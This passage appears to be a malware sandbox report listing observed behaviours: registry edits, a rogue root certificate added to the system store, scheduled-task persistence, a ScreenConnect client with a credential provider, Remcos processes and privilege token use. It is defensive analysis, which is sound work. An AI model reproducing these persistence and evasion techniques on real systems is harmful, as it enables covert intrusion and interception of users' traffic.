Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\PackageCode = "84F03508698966EF2ABADC1907673931" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell\open C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\PackageName = "setup.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1045960512-3948844814-3059691613-1000\{020CC76E-28AB-4434-8B9F-D648DCEE2007} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-c13606fe9009f11d C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-c13606fe9009f11d\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\84F03508698966EF2ABADC1907673931\Full C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\c13606fe9009f11d\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\84F03508698966EF2ABADC1907673931 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\9B17BA2F046B25CF1C6360EF09901FD1\84F03508698966EF2ABADC1907673931 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\ProductName = "ScreenConnect Client (c13606fe9009f11d)" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Version = "402784261" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\c13606fe9009f11d\\" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (c13606fe9009f11d)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\9B17BA2F046B25CF1C6360EF09901FD1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\Files\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\ = "ScreenConnect Client (c13606fe9009f11d) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (c13606fe9009f11d)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\ProductIcon = "C:\\Windows\\Installer\\{80530F48-9896-FE66-A2AB-CD9170769313}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\ProgramData\tst\remcos.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\2020.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\223522870.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
